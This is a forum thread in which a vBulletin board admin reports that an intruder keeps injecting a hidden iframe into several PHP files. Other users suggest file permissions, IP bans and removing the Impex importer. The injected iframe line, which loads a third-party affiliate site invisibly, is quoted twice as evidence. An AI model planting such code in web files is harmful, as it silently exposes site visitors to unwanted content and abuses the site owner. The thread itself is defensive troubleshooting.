I have a slight problem with an affiliate hacker. This lil twit modifies index.php, forumdisplay.php and showthread.php with the following code.

echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

It is usually placed at the bottom of the php file. like in forumdisplay.php

$show['forumsearch'] = iif (!$show['search_engine'] AND $forumperms & $vbulletin->bf_ugp_forumpermissions['cansearch'] AND $vbulletin->options['enablesearches'], true, false);
$show['forumslist'] = iif ($forumshown, true, false);
$show['stickies'] = iif ($threadbits_sticky != '', true, false);
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

($hook = vBulletinHook::fetch_hook('forumdisplay_complete') ) ? eval($hook) : false;

The code messes up the template and creates a number of pop-ups.

It's simple enough to fix but I want to prevent it from happening again, seems every three days or so it is back.

Can I just chmod these files or will that mess up the board even more?

Thanks,
Gil

http://www.masscops.com/forums/police_portal_index.php?

You should be able to chmod them 644 I believe

You should be able to chmod them 644 I believe
mine are 644'd and i'm showing similar signs of this same dude on both AutomotiveArena.com and WorkSafeBoredom.com

Yeah mine are already 644 also. Would 444 be an option?

Gonna try it and see what happens.

UPDATE:

Ok the 444 seems to be working for the time, don't know if the lil twit has tried it again or not but how was he able to do this in the first place?

I am not a security expert by any means but I think my vB is pretty secure. (renamed admin folders, htaccess etc...)

Is this some type of mysql injection or something?

The chmod 444 did not stop the lil twit.

On top of that the files that I did a chmod on were reverted back to 644.

Another interesting item, today just before I got hacked I had a new user join the forum.

IP Address used was 201.17.220.203

There is a new user, bunda at MassCops - Massachusetts Law Enforcement Network

To view their profile, go here:

http://www.masscops.com/forums/member.php?u=4212

Email Address : soauker@gmail.com
Birthday :


Is there anyway I can stop this guy????

IMO, he gave himself away (the assumption it is a he). If it were me, I would block the whole HOST IP range in the vbulletin and if you have a firewall, add it to the firewall.

Server co. says he is getting in through the impex directory....

Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup

already done, hope that was it...

Don't forget to ban his IP addresses though :P

Heh, Impex should always be removed after you use it for reasons just like this. I hope it solved your problem. I took the liberty of banning his IP and email from my forums, too, just in case he happens to stumble upon them on google or something. Thanks for the heads up.

Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup


Hello,

Looks like great advice, but where is the impex file so that I can delete it? Also, now that I have 3.5.4 installed, can I delete the install directory that seems to have all the upgrade files in it?

Thank You for you Help!

Nuguru :)

The Impex files are located in a folder that's located in your forum root named "impex"; you can remove the entire directory. In your /includes remove the file "cpnav_impex.php".

As for your install directory remove "install.php" and all of the "upgrade.php" files or simply remove the directory itself.

impex will be a directory called .... impex :)

you can delete the install directory.

The Impex files are located in a folder that's located in your forum root named "impex"; you can remove the entire directory. In your /includes remove the file "cpnav_impex.php".

As for your install directory remove "install.php" and all of the "upgrade.php" files or simply remove the directory itself.


Thank You for the Quick Reponse.


Nuguru

I have a file directory called "installer." Can i delete that file? I also just deleted my "install" directory...

I'm not sure if this file has anything to do with the 3.6 upgrade, although it has a file called "product-ucs.xml" within it. So could this be a Ucash installer file?